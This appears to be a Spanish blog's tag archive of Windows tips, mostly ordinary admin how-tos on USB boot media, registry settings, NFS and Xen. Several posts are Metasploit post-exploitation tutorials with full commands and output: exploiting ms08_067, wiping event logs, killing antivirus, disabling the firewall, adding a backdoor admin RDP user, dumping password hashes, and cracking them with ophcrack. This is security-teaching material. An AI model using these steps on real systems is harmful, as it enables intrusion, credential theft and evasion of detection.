Mostrando entradas con la etiqueta windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta windows. Mostrar todas las entradas

Crear USB con Windows 7

Sí, lo se, no suelo hablar de temas relacionados con Windows en el blog, pero hay veces que toca hacerlo y hoy será una de esas veces. El problema vino cuando me tocó formatear un ordenador para instalar un Windows 7. Este equipo no tenía lectora de CD para poder arrancar, con lo cual, necesitaba partir de la ISO de Windows y pasarla a un pen drive y hacerlo arrancable. Para eso siempre uso unetbootin, pero esta vez no funcionaba. Investigando un poco se ve que unetbootin no termina de llevarse bien con Win7, así que tuve que buscar otra forma. Esta, la verdad, es que hasta me gustó más. El único problema es que necesitas un Windows previo. Así que... empleé el Windows que iba a 'rematar' para que crease a su asesino.
A continuación os detallo los pasos a realizar, por si a alguien le son de ayuda. El primero y obvio es tener identificado el pen drive al que va a ir el contenido de la ISO. A continuación abrimos una consola (cmd) como administrador y ejecutamos diskpart. Esto nos abrirá una shell de comandos y en ella hacemos lo siguiente,
  • list disk
    Saca un listado de los disco conectados al equipo.
  • select disk 2
    Seleccionamos el disco correspondiente al pen drive. En número puede cambiar dependiente de tu sistema.
  • clean
    Borra todos los datos del pen drive.
  • create partition primary
    Se crea una partición primaria.
  • active
    Se marca la partición como activa.
  • format fs=fat32 quick
    Se formatea el pen drive con un sistema de ficheros fat32.
  • assign
    Confirmamos los cambios.
  • exit
    Salimos del programa.
Una vez finalizados estos pasos, ya estamos casi a punto de terminar de crear nuestro pen drive booteable. Únicamente nos falta por indicarle lo que tenemos que arrancar, es decir, el Windows. Pues bien, cogemos la ISO y la descomprimimos dentro de la unidad. Cuando haya finalizado, reinicia el equipo y ya deberías de poder arrancar desde él.

En caso de que esto fallo, todavía hay un método extra. Vuelve a arrancar el equipo y arrancas una consola (cmd) y ejecutas lo siguiente. Partimos de que la unidad del pen drive es F:
cmd> F:\BOOT\bootsect /nt60 F:
Reinicia el equipo y ahora si que ya debería de poder arrancar.
Leer más

Windows 10, anunciado

Para finalizar la semana, algo que creo, todo pensamos tras el anuncio del nuevo Windows 10, tras el salto de una versión, dejando en el olvido a Windows 9.
Paradoja del Windows bueno vs. Windows malo
Leer más

Borrar memoria swap (Pagefile.sys) al apagar sistema

Hacía tiempo que no escribía ningún truco acerca de Windows. Y como no hay que ser radical, pues ahí va. Vamos a ver cómo forzar a Windows a borrar el archivo de paginación en el apagado.
Antes de nada, aclarar que Windows también emplea un sistema de paginación, o memoria swap, al más puro estilo Linux. Si bien es cierto que bajo sistemas Linux suele localizarse en una partición separada, en sistemas Windows, ésta está ubicada como un fichero dentro de la partición principal (C:\, generalmente). Aquí se guardan de forma temporal todos aquellos datos que no cogen en la RAM y son necesarios para el trabajo. Puesto que algunos de los datos que aquí se pueden almacenar son, por ejemplo, contraseñas, URLs, etc. no está demás forzar el borrado de dicho fichero al apagar el equipo.
Vamos por lo tanto a ver cómo borrar el fichero Pagefile.sys con los medio que Windows nos ofrece.
  • Ejecutar regedit.exe
  • Buscar la clave
    HKEY_LOCAL_MACHINE
     + SYSTEM
       |
       + CurrentControlSet
         |
         + Control
           |
           + Session Manager
             |
             + Memory Management
    
  • Editar la clave ClearPageFileAtShutdown y establecer su valor a 1, dejando el tipo REG_DWORD.
El cambio es inmediato y la próxima vez que apaguéis el equipo, veréis que tras activar esto, el disco tiene mucha actividad instantes antes de apagarse completamente. El proceso de apagado es un poco más lento, puesto que borra el fichero del disco, pero compensa con el extra de seguridad que nos puede ofrecer.

Más información acerca del proceso en el soporte oficial de Microsoft.

Leer más

Históricos de dispositivos USB en Windows

Windows, el sistema más usado actualmente, es una fuente de sabiduría. Todo lo que pasa en él se queda, por lo general, almacenado en el registro. Hoy os dejo la ruta para que podías averiguar todos los dispositivos USB que se han conectado a lo largo de la vida del equipo a vuestra máquina. Puede que no tenga demasiado interés, pero siempre es bueno recordarlo.
HKEY_LOCAL_MACHINE\
 |
 -SYSTEM\
  |
  -CurrentControlSet\
   |
   -Enum\
    |
    -USBSTOR
Leer más

Windows como escritorio de Linux


Para todos aquellos que solemos usar GNU/Linux estamos muy felices con él, pero siempre hay veces que es necesario tener un Windows a mano. No por que nosotros queramos, sino por que hay veces que se hace estrictamente necesario, bien por una aplicación que no hay versión para Linux, un fichero de office ;-), etc. También se puede dar el caso de un ordenador compartido en el que tras el login se puede iniciar una sesión Windows o Linux.
Ahora imaginémonos que todo el control de usuarios/contraseñas se las dejamos al sistema base (GNU/Linux) y el interfaz gráfico pues a elección de la persona que inicie. Así alguien podría decidir en un momento arrancar con KDE y en otro con WindowsXP. Esta opción daría una gran ventaja, ya que presentaría el equipo Windows como un escritorio más de inicio de sesión.

Por lo tanto, la idea es realizar una pequeña instalación de una máquina con VirtualBox, en nuestro caso y por que nos interesa, con Windows XP y luego agregarla como una opción más en el menú de GDM. Así, cuando un usuario decida arrancar con el escritorio Windows, se iniciará una instancia de dicha máquina virtual, la usará como un escritorio más y al finalizar simplemente volverá a la pantalla de login.
Como veremos a continuación, realizar esto es bastante sencillo, por lo que gracias a puppet replicarlo por una red de ordenadores, léase una facultad por ejemplo, sería muy sencillo.
Vamos a comenzar por el principio pues, realizando la instalación de los paquetes que nos hacen falta en nuestra distribución. En este caso, Debian ;-)
shell> apt-get install virtualbox-ose virtualbox-guest-additions
Al finalizar la instalación, simplemente arrancamos VirtualBox e instalamos el sistema que deseemos. En nuestro caso Windows XP. Creamos el disco (a poder ser, de tamaño fijo) y también le permitimos acceso a la red. Al finalizar toda la instalación, cerramos VirtualBox y seguimos configurando lo que nos falta.
Toca ahora añadir en el menú de GDM una nueva entrada con nuestro nuevo escritorio. Para ello creamos un nuevo fichero llamado WindowsXP.desktop bajo /usr/share/xsessions con el siguiente contenido:
[Desktop Entry]
  Encoding=UTF-8
  Name=Windows XP
  Comment=Use esta sesion para ejecutar Windows XP
  Exec=/usr/bin/Windows-XP-GDM
  Icon=
  Type=Application
Tras guardarlo en GDM ya aparecerá una nueva línea que nos permitirá iniciar sesión en el Windows virtual, pero en ningún lado le hemos dicho nada.
Sí, efectivamente el parámetro Exec del fichero WindowsXP.desktop es el que nos da la solución. Tenemos que crear dicho fichero (/usr/bin/Windows-XP-GDM) y el contenido del mismo será,
#!/bin/bash
VBoxSDL -vm WinXP -fullscreen
Simplemente le indicamos que arranque una estancia de una máquina virtual (en este caso WinXP) y a pantalla completa.

Al iniciar el usuario con este "nuevo escritorio" se iniciará la máquina virtual automáticamente y el usuario verá que su escritorio es realmente un Windows. Cuando la apague, automáticamente regresará a la ventana de login.
En breves intentaré dejar un manifiesto puppet que haga automáticamente este proceso para demostrar lo sencillo que sería distribuir sistema en una red de ordenadores.
Y por si alguien se lo está preguntando, gracias a VirtualBox la aceleración hardware ya no es un problema. Tras instalar la máquina virtual, instalamos los drivers (virtualbox-guest-additions) y todo irá muy fluido. Si te atreves a probarlo, comenta tu experiencia!
Leer más

metasploit, borrar log's de Windows

Tras realizar un acceso no deseado a un equipo con Windows y tras garantizarnos próximos acceso a dicho sistema, la idea es dejar el mínimo rastro posible. Esta es una de las tareas más importantes en la post-explotación, la ocultación. Windows guarda una especie de log's o registros del sistema para poder saber qué es lo que está pasando, así que una de las formas más sencillas de poder ocultar el acceso, es lógicamente borrarlos. Por suerte, metasploit en meterpreter trae consigo un par de componentes que ayudan a realizar esta tarea. El primero es el uso del modo incógnito, que lo que hace es intentar ocultar todo lo posible todas aquellas tareas que se hagan en el sistema, así como la presencia de un "no deseado" en el mismo.
meterpreter> load incognito
Otra de las formas que hay es borrar los registros que hemos mencionado. Esto es lo mejor que se puede realizar justo antes de abandonar el equipo, para borrar rastro creado en los mismos. Se borrará todo el contenido de los registros.
meterpreter> clearev
[*] Wiping 88 records from Application...
[*] Wiping 136 records from System...
[*] Wiping 0 records from Security...
Leer más

XenSource, PV drivers para windows

Son muchas las personas que deciden optar por sistemas de virtualización de pago, como puede ser XenServer o VMWare, ya que una de las ventajas que presentan es el conocimiento de la plataforma Windows. Si tienes que virtualizar uno o varios equipos con Windows, estas empresas tiene unos driver's que hacen que el equipo Windows virtual se ejecute con mucho mejor rendimiento que si empleas la versión free de Xen.
Sin embargo si deseas seguir usando Xen como sistema de virtualización, pero quieres mejorar el performance de tus equipos Windows, quizás te interesa saber que existen unos drivers "libres", Xen PV Drivers, que modifican el acceso a disco y la tarjeta de red mejorando notablemente el rendimiento, especialmente en lo que acceso a disco se refiere. Los puedes descargar desde aquí.
Leer más

metasploit, vnc payload

La costumbre es una mala compañera de viaje. Siempre que hacía análisis de equipos empleaba los mismos 3 o 4 payload's y era bastante raro que me fijase en mucho más. La idea era siempre la misma, conseguir un acceso al equipo (una shell de meterpreter, por ejemplo). Hoy de casualidad he descubierto un nuevo payload, vncinject/bind_tcp, que no es más que un simple payload que ofrece la posibilidad de abrir una pequeña ventana con la conexión vnc y una shell. Explotar las cosas en un equipo windows con interfaz gráfica es mucho más simple. Una sesión de meterpreter y una de vnc facilitan mucho las cosas. Vamos a ver a continuación cómo usar este nuevo payload.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> set PAYLOAD windows/vncinject/bind_tcp 
msf exploit(ms08_067_netapi)> set RHOST 192.168.1.50
msf exploit(ms08_067_netapi)> set RHOST 192.168.1.33
msf exploit(ms08_067_netapi)> exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.1.50
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 2 created in the background.

VNC Viewer Free Edition 4.1.1 for X - built Mar 10 2010 21:40:13
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
Thu Sep 13 16:24:07 2012
 CConn:       connected to host 127.0.0.1 port 5900

Thu Sep 13 16:24:08 2012
 CConnection: Server supports RFB protocol version 3.8
 CConnection: Using RFB protocol version 3.8
 TXImage:     Using default colormap and visual, TrueColor, depth 24.
 CConn:       Using pixel format depth 6 (8bpp) rgb222
 CConn:       Using ZRLE encoding

Thu Sep 13 16:24:09 2012
 CConn:       Throughput 20625 kbit/s - changing to hextile encoding
 CConn:       Throughput 20625 kbit/s - changing to full colour
 CConn:       Using pixel format depth 24 (32bpp) little-endian rgb888
 CConn:       Using hextile encoding

msf exploit(ms08_067_netapi)>
Tras lanzar el exploit, obtendremos una ventana con la conexión vnc establecida, si la explotación fue satisfactoria.
windows vnc connection
Leer más

putty, backup de configuración

Aunque soy usuario de GNU/Linux hay veces que para acceder a algún equipo lo debes hacer desde un equipo Windows y por suerte, putty para conexiones ssh funciona perfectamente. El problema es que en ciertas ocasiones, cuando cambias de equipo, toda la configuración que se tenía de putty se pierde. Para evitar esto, hoy os presento un pequeño truco, cómo exportar dicha configuración de putty para poder cargarla nuevamente en otro sistema.
Como todo buen servicio en Windows, prácticamente todo está escrito en el registro, por lo tanto para hacer una copia de la configuración nos serviría con hacer un backup del registro. El problema está en saber qué clave es. La respuesta,
HKEY_CURRENT_USER\Software\SimonTatham
Con hacer un backup de esta carpeta de registro ya nos llegaría. Para hacerlo, o bien vamos desde el interfaz gráfico y lo hacemos o bien empleamos la línea de comandos para hacerlo. Desde la línea de comandos sería algo tal que así,
cmd regedit /e "putty.reg" HKEY_CURRENT_USER\Software\SimonTatham\
Si lo hacemos desde el interfaz,

Leer más

metasploit, no firewall + no antivirus

Tras obtener acceso a un equipo con Windows por alguna vulnerabilidad lo primero que debemos hacer es garantizarnos que su antivirus no nos detecte y nos bloquee y posteriormente desactivar el cortafuegos (si es que lo hubiera) para evitar así que nos bloquee próximas intrusiones, esta vez ya "consentidas". Estas dos tareas están dentro de la post-explotación de una vulnerabilidad y deben ser de las primeras en lanzarse, para intentar conseguir estar el máximo tiempo posible dentro del equipo.
Entonces, ¿cómo hacemos para desactivar el antivirus? Por suerte meterpreter trae la solución ya implantada de mano,
meterpreter> run killav
[*] Killing Antivirus services on the target...
Este pequeño comando, ya implementado mata todas las sesiones de los antivirus más conocidos, dejando así el sistema indefenso. Luego una vez no haya ya antivirus lo que debemos de realizar es una pequeña comprobación de servicios, para así terminar por desactivar el antivirus en futuros inicios del equipo. Esto lo podemos conseguir con el comando tasklist, para luego gracias al comando sc poder desactivarlo.
meterpreter> shell
Process 1092 created.
Channel 2 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> tasklist /svc
tasklist /svc

Nombre de imagen      PID  Servicios
===================== ==== ============================================
System Idle Process      0 N/D
System                   4 N/D
smss.exe               392 N/D
csrss.exe              720 N/D
winlogon.exe           744 N/D
services.exe           796 Eventlog, PlugPlay
lsass.exe              816 ProtectedStorage, SamSs
svchost.exe            976 DcomLaunch, TermService
svchost.exe           1040 RpcSs
svchost.exe           1128 AudioSrv, Browser, CryptSvc, Dhcp,
                           dmserver, ERSvc, EventSystem,
                           FastUserSwitchingCompatibility, helpsvc,
                           lanmanserver, lanmanworkstation, Netman,
                           Nla, Schedule, seclogon, SENS, SharedAccess,
                           ShellHWDetection, srservice, Themes, TrkWks,
                           W32Time, winmgmt, wscsvc, wuauserv, WZCSVC
logonui.exe           1136 N/D
svchost.exe           1352 Dnscache
svchost.exe           1368 LmHosts, RemoteRegistry, SSDPSRV
spoolsv.exe           1528 Spooler
cvpnd.exe             2016 CVPND
...
Esta salida agrupa los procesos por servicios, así que sólo queda encontrar el servicio de antivirus, por ejemplo, usando
C:\WINDOWS\system32> tasklist /svc | find /I "avg"
tasklist /svc | find /I "avg"
avgwdsvc.exe          3958  avgwd
avgnsx.exe            3912  N/A
avgemcx.exe           3594  N/A
avgtray.exe           3698  N/A
avgidagent.exe        3125  AVGIDSAgent
avgrsx.exe            2658  N/A
avgcsrvx.exe          4005  N/A
Y una vez sepamos que sí está presente en el sistema, únicamente lo deshabilitamos,
C:\WINDOWS\system32> sc config avgwd start=disable
sc config avgwd start=disable
[SC] ChangeServiceConfig SUCCESS

C:\WINDOWS\system32> sc config AVGIDSAgent start=disable
sc config AVGIDSAgent start=disable
[SC] ChangeServiceConfig SUCCESS
Tras esto, en los próximos reinicios del sistema, el antivirus no debería de arrancar.
Ahora tenemos que aprovechar que tenemos acceso para parar el cortafuegos. Para hacerlo,
meterpreter> shell
Process 1880 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> netsh firewall set opmode mode=disable
netsh firewall set opmode mode=disable
Aceptar
Tras ejecutarlo satisfactoriamente,
C:\WINDOWS\system32> netsh firewall show opmode
netsh firewall show opmode

Configuración del perfil Dominio:
-------------------------------------------------------------------
Modo funcional                                = Habilitar
Modo de excepción                             = Habilitar

Configuración del perfil Estándar (actual):
-------------------------------------------------------------------
Modo funcional                                = Deshabilitar
Modo de excepci¢n                             = Habilitar

Configuración del servidor de seguridad conexión de rea local:
-------------------------------------------------------------------
Modo funcional                                = Habilitar
Lo que, por ejemplo en mi Windows XP ha provocado un popup de advertencia (ya que así lo tengo configurado).
Leer más

Windows 2008 server, ntp client

NTP es un protocolo de sincronización de relojes en red y por suerte está implementado tanto en sistemas GNU/Linux, como en sistemas Windows, hace ya varias versiones.
Si tenemos un sistema Windows 2008, la forma de hacerlo también es simple, aunque parece que los de Redmond intentan siempre complicar las cosas. Para conseguirlo, simplemente abrimos una consola (cmd) y ejecutamos lo siguiente,
cmd> w32tm /config /update /manualpeerlist:ntp.server.com  /syncfromflags:MANUAL /reliable:YES
cmd> w32tm /query /sour
Leer más

ophcrack, obtener contraseñas de windows

Recientemente hablamos sobre cómo conseguir un listado de la base de datos SAM de Windows, que contiene todas las contraseñas cifradas. Aunque este cifrado es ampliamente conocido, la explotación del mismo puede llevar bastante tiempo, así que hoy os quiero presentar un pequeño software que nos ayudará y mucho a agilizar el proceso de paso de caracteres extraños a contraseña 'entendible'. Se llama ophcrack y es un pequeño programa escrito en C y que tiene a mayores una serie de diccionarios. El modo de funcionamiento es muy similar al de un buscador. Previamente se han construido las contraseñas con su correspondiente encriptación y se han indexado. Ahora sólo hay que buscarlas y ya estará listo. Vamos a ver paso a paso, cómo trabajar con él.
  • Obtener ophcrack
    Este es el primer paso. Para conseguirlo nos vamos a la páguina oficial y lo descargamos. Existe una versión para Windows y otra para GNU/Linux. EN nuestro caso, descargamos la versión para Linux.
    Una vez la tengamos, sólo queda compilar el software. Para ello,
    shell> tar jxvf ophcrack-3.4.0.tar.bz2
    shell> cd ophcrack-3.4.0
    shell> ./configure
    shell> make
    shell> make install
    
  • Obtener las tablas de contraseñas
    Este es el segundo paso y realmente el más importante, ya que aquí en donde reside el potencial de este software. Para obtenerlas, vamos a la URL de descarga y seleccionamos el fichero que más nos convenga. Puesto que lo voy a emplear con un Windows XP, vamos a descargar el XP free fast.
  • Configurar ophcrack
    Ahora que ya tenemos todo preparado, simplemente arrancamos el software y desde el interfaz cargamos las tablas que se han descargado. Las tablas permanecerán en disco y serán cargadas en memoria cuando sea necesario emplearlas.
    El siguiente paso es cargar el fichero (o claves individuales) que se han obtenido (mira cómo hacerlo) y presionar en Crack. En muy poco tiempo tendremos todas las claves que se hayan podido encontrar (depende del diccionario empleado) en texto plano, como en la imagen.
Si ves que tras ejecutarlo casi no se obtiene ninguna contraseña con los diccionarios pequeños libres, eso es bueno ya que no es factible un ataque por diccionario y la contraseña usa símbolos.
Leer más

metasploit, conexión a escritorio remoto

Hay una cosa que está clara, si Windows ha triunfado es por su escritorio y por la 'facilidad' de manejo que éste ofrece. Casi cualquier cosa la puedes hacer de forma simple con el ratón y viéndolo, mientras que el uso de windows desde línea de comandos es más bien complejo. Permite hacer una gran cantidad de cosas, pero más complejas. Para solucionarlo, Windows permite compartir el escritorio con otros equipos y así facilitar la vida a los administradores (y también, por ende a los atacantes). Hoy vamos a ver una forma muy simple de crear un nuevo usuario y activar para él el acceso a escritorio remoto una vez que tenemos una sesión de meterpreter.
msf exploit(ms08_067_netapi)> sessions -l

Active sessions
===============

Id  Type         Information   Connection
--  ----         -----------   ----------
 1  meterpreter  NT AUTHORITY  192.168.1.33:4444 -> 192.168.1.50:1125
Pues bien, accedemos a la sesión de meterpreter y empleamos comando/exploit getgui que como su nombre apunta, 'da un acceso gráfico'.
msf exploit(ms08_067_netapi)> sessions -i 1
[*] Starting interaction with 1...

meterpreter> run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u username -p password
Or:    getgui -e

OPTIONS:

  -e       Enable RDP only.
  -f opt   Forward RDP Connection.
  -h       Help menu.
  -p opt   The Password of the user to add.
  -u opt   The Username of the user to add.
Es necesario pasarle los parámetros adecuados, es decir, el nombre y la contraseña del nuevo usuario que vamos a crear con acceso remoto.
meterpreter> run getgui -u shell -p p0wned
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator 
[*] Carlos Perez carlos_perez@darkoperator.com 
[*] Enabling Remote Desktop 
[*]  RDP is disabled; enabling it ... 
[*] Setting Terminal Services service startup mode 
[*]  The Terminal Services service is not set to auto, changing it
[*]  Opening port in local firewall if necessary 
[*] Setting user account for logon 
[*]  Adding User: shell with Password: p0wned 
[*]  Adding User: shell to local group Remote Desktop Users 
[*]  Adding User: shell to local group Administrators 
[*] You can now login with the created user 
[*] For cleanup use command: run multi_console_command -rc ~/clean_up.rc
En caso de que hayamos empleado algún otro método para saber la contraseña de los usuarios ya creados, también podemos emplear este exploit para habilitar el acceso de escritorio remoto y así poder acceder al equipo.
meterpreter> run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*]  RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]  The Terminal Services service is not set to auto, changing it
[*]  Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc ~/clean_up.rc
Leer más

Windows 7, cliente NFS


Por fin, después de mucho tiempo descubro, por casualidad, que la última versión del sistema operativo de Microsoft (Windows 7) tiene la posibilidad de tener un cliente nativo de NFS para acceder a recursos en red. Quizás por fin hayan descubierto que NFS es mejor protocolo para compartir ficheros, quizás sepan que en las redes hay servidores con NFS, etc. Sea lo que sea, lo importante es que ya se puede montar una unidad de red a través de NFS.

Para comer usarla, primero tenemos que instalar los componentes de Windows necesarios.

Tras elegir el cliente NFS y aceptar se instalará el software que falte para tener dicho componente activo. Ahora, una vez lo tengamos tenemos que abrir una consola (cmd) como usuario administrador y ejecutar en ella el resto de comandos. Lo único que necesario será habilitar el servicio NFS.

C:\> nfsadmin client start

The service was started successfully.
Y tras ello, montar la unidad de red, tal como sigue,
C:\> mount -o anon,nolock,r,casesensitive \\192.168.0.10\home *
Z: is now successfully connected to \\192.168.0.10\home

The command completed successfully.
Para desmontarla, al más puro estilo GNU/Linux, umount.
C:\> umount.exe Z:

Disconnecting           Z:      \\192.168.0.10\home
The command completed successfully.
Leer más

Windows: variables de sistema

Windows, al igual que GNU/Linux tiene también una serie de variables de entorno que permiten trabajar más fácilmente. Para saber cuales son, desde la consola (cmd) podemos averiguarlo de forma simple,
cmd> set
  ALLUSERSPROFILE=C:\Documents and Settings\All Users
  APPDATA=C:\Documents and Settings\Administrador\Datos de programa
  CLIENTNAME=Console
  CommonProgramFiles=C:\Archivos de programa\Archivos comunes
  COMPUTERNAME=WIN-VIRT
  ComSpec=C:\WINDOWS\system32\cmd.exe
  FP_NO_HOST_CHECK=NO
  HOMEDRIVE=C:
  HOMEPATH=\Documents and Settings\Administrador
  LOGONSERVER=\\WIN-VIRT
  NUMBER_OF_PROCESSORS=1
  OS=Windows_NT
  Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
  PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
  PROCESSOR_ARCHITECTURE=x86
  PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 7, GenuineIntel
  PROCESSOR_LEVEL=6
  PROCESSOR_REVISION=0f07
  ProgramFiles=C:\Archivos de programa
  PROMPT=$P$G
  SYS=C:\
  SystemDrive=C:
  SystemRoot=C:\WINDOWS
  TEMP=C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp
  TMP=C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp
  USERDOMAIN=WIN-VIRT
  USERNAME=Administrador
  USERPROFILE=C:\Documents and Settings\Administrador
  windir=C:\WINDOWS
Y también con el mismo comando podemos establecer nuevas variables para el sistema en caso de interesarnos. El formato:
cmd> set VAR=CADENA
Por ejemplo,
cmd> set P=ALL\ DATA
Leer más

xen, instalación de máquina windows desde iso

Aunque ya hemos hablado en este blog alguna vez de xen, siempre nos referimos a XenServer, la versión de pago de xen. En este caso vamos a hablar sobre cómo crear una nueva máquina (en este caso Windows XP, pero extrapolable a cualquier otro sistema operativo) en la versión gratuita de xen. En nuestro caso emplearemos la versión de Debian y las xen-utils-common.
Si estamos empleando las xen-tools, la instalación de máquinas debian/ubuntu es muy sencilla, pero con máquinas que precisen de intervención para su instalación (como es el caso de Windows) la cosa se complica. Así que vamos a ver cómo crear el fichero de configuración para que emplee una iso para arrancar y cómo activar VNC para poder interactuar con la máquina durante la instalación.
Antes de comenzar tenemos que preparar el disco sobre el que vamos a realizar la instalación. Como vamos a emplear LVM, creamos un nuevo disco,
shell> lvcreate -L 25G -n windows-disk vg0
Ahora creamos el fichero de configuración,
builder      = 'hvm'
memory       = '1024'
device_model = '/usr/lib/xen-4.0/bin/qemu-dm'

disk         = [ 'phy:/dev/vg0/windows-disk,ioemu:hda,w',
                 'file:/home/javier/win.iso,hdc:cdrom,r'
               ]

name = 'windows'

vif = [ 'bridge=eth0' ]

boot='d'
vnc = 1
vncviewer = 1
vnclisten="192.168.1.2"
sdl = 0
on_poweroff = 'destroy'
on_reboot   = 'restart'
on_crash    = 'restart'
Las partes importantes son las destacadas con negrita, que se refieren al paso de la imagen iso como dispositivo cdrom de entrada al Windows. También se le indica que arranque desde el dispositivo d (boot='d') y que permita una conexión vnc a la IP del servidor xen. Tras tener el fichero de configuración listo, arrancamos la máquina.
shell> xm create windows.cfg
Ahora ya se podrá acceder vía vnc a la pantalla de la máquina, para proceder con la instalación. Cuando ésta termine, será aconsejable deshabilitar la conexión vnc, el cdrom virtual (si no se va a emplear) e indicar que arranque desde el disco C (disco duro 'local'). Quedaría entonces tal que así,
builder      = 'hvm'
memory       = '1024'
device_model = '/usr/lib/xen-4.0/bin/qemu-dm'

disk         = [ 'phy:/dev/vg0/windows-disk,ioemu:hda,w' ]

name = 'windows'

vif = [ 'bridge=eth0' ]

boot='c'
sdl = 0
on_poweroff = 'destroy'
on_reboot   = 'restart'
on_crash    = 'restart'
Leer más

Windows File Checker


Todos los sistemas operativos, por norma general, con el uso de van degradando y Windows es de los que más. Esto es debido a que Windows tiene un mayor número de virus y programas que intentan alterar sus binarios y así permitir que se ejecuten de forma camuflada procesos que de otra forma no estarían autorizados.
Para proteger los archivos críticos del sistema, Windows tiene una utilidad llamada sfc que compara los originales con los actuales y en caso de que difieran en algo, restaura los originales. Puesto que los originales estaban en el CD legal, éstos no debieran de estar infectados, por ejemplo.
cmd> sfc /help

Microsoft(R) Windows XP Windows File Checker Versión 5.1
(C) 1999-2000 Microsoft Corp. Todos los derechos reservados

Busca arch. de sist. proteg. y reemplaza las versiones incorrectas por
las correctas.

SFC [/SCANNOW|/SCANONCE|/SCANBOOT|/REVERT|/PURGECACHE|/CACHESIZE=x

/SCANNOW     Busca archivos de sist. proteg.
/SCANONCE    Busca, en el próximo inicio, arch. de sist. proteg.
/SCANBOOT    Busca, en cada inicio, arch. de sist. proteg.
/CANCEL      Cancela las búsquedas en espera de arch. de sist. proteg.
/REVERT      Devuelve la búsqueda a la configuración predeterminada.
/PURGECACHE  Purga la caché de arch. y busca arch. de sist. proteg.
/CACHESIZE=x Establece el tamaño de la caché de arch.
Para emplear sfc basta que ordenemos realizar un escaneo a todo el sistema. El único requisito es tener el CD original de la instalación en la unidad lectora.
cmd> sfc /scannow
Tras finalizar la ejecución de sfc todos los binarios del sistema estarán restaurados a los originales.
Ventana de sfc
Leer más

Dejar de compartir C$ en Windows (XP, Vista y 7)

Uno de los fallos de seguridad que todo linuxero encuentra al trabajar o intentar acceder a un sistema Windows por samba es que por defecto siempre está compartida la unidad C$ (D$, E$, etc.). Esto significa que si sabes la contraseña del equipo puedes acceder a toda la partición. Aunque esto puede resultar interesante en muchos casos, ya que simplifica la compartición de archivos, realmente también puede suponer un fallo de seguridad. Veamos un ejemplo,
shell> smbclient -L 192.168.1.35
Enter javier's password: 
Domain=[WIN-VIRT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC remota
D$              Disk      Recurso predeterminado
print$          Disk      Controladores de impresora
ADMIN$          Disk      Admin remota
C$              Disk      Recurso predeterminado
Compartido      Disk      
Datos           Disk      
Como se puede observar, todo el disco está compartido en red, tanto la unidad C, como la D. Puesto que tener todos los datos compartidos no nos interesa, vamos a ver cómo poder sacarlos. Para ello, tendremos que modificar el registro del sistema Windows, así que desde regedit, vamos a la clave
HKEY_LOCAL_MACHINE\
 |
 -SYSTEM\
  |
  -CurrentControlSet\
   |
   -Services\
    |
    -LanmanServer\
     |
     -Parameters\
      |
      -AutoShareWks
La clave AutoShareWks debe ser de tipo REG_DWORD y su valor debe ser 0 (cero), para que Windows no comparta automáticamente los recursos administrativos.
Una vez se haya modificado este valor, simplemente desde la consola (cmd) se reinicia el servicios samba de Windows, tal como sigue
C:\> net stop server
C:\> net start server
Tras esto, comprobamos qué es lo que está compartido en el equipo y vemos que los recursos administrativos (C$ y D$) ya no lo están.
shell> smbclient -L 192.168.1.35
Enter javier's password: 
Domain=[WIN-VIRT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC remota
print$          Disk      Controladores de impresora
Compartido      Disk      
Datos           Disk      
Leer más

metasploit, obteniendo contraseñas y frases de usuarios en Windows

Otra vez volvemos a presentar algo de metasploit. En este caso una forma sencilla de obtener un volcado del hashdump de usuarios y contraseñas de un equipo al que tengamos acceso, así como un listado de las frases que usa Windows para darle pistas al usuario en caso de que se olvide la contraseña. Esta frase si está bien creada puede ayudar a descubrir la contraseña del usuario de forma simple, ya que da información que empleando redes sociales o ingeniería social, se podría conseguir. Para poder conseguir estos datos únicamente debemos de tener usa sesión de meterpreter activa.
msf exploit(ms08_067_netapi)> sessions -l

Active sessions
===============

Id  Type        Information  Connection
--  ----        -----------  ----------
1   meterpreter WIN-VIRT     192.168.1.33:4444 -> 192.168.1.50:1949
Si tenemos esto, entonces ya podemos emplear 2 módulos existentes para obtener el hashdump que nos interes. Estos módulos son:
  • smart_hashdump
    msf post(ms08_067_netapi)> use post/windows/gather/smart_hashdump
    msf post(smart_hashdump)> set SESSION 1
    SESSION => 1
    msf post(smart_hashdump)> exploit 
    
    [*] Running module against WIN-VIRT
    [*] Hashes will be saved to the database if one is connected.
    [*] Hashes will be saved in loot in JtR password file format to:
    [*] /root/.msf4/loot/default_192.168.1.50_windows.hashes.txt
    [*] Dumping password hashes...
    [*] Running as SYSTEM extracting hashes from registry
    [*]  Obtaining the boot key...
    [*]  Calculating the hboot key using SYSKEY 264XXX
    [*]  Obtaining the user list and keys...
    [*]  Decrypting user keys...
    [*]  Dumping password hints...
    [+]  Javier:"p0wned"
    [*]  Dumping password hashes...
    [+]  Administrador:500:5b98b5c244XXX:::
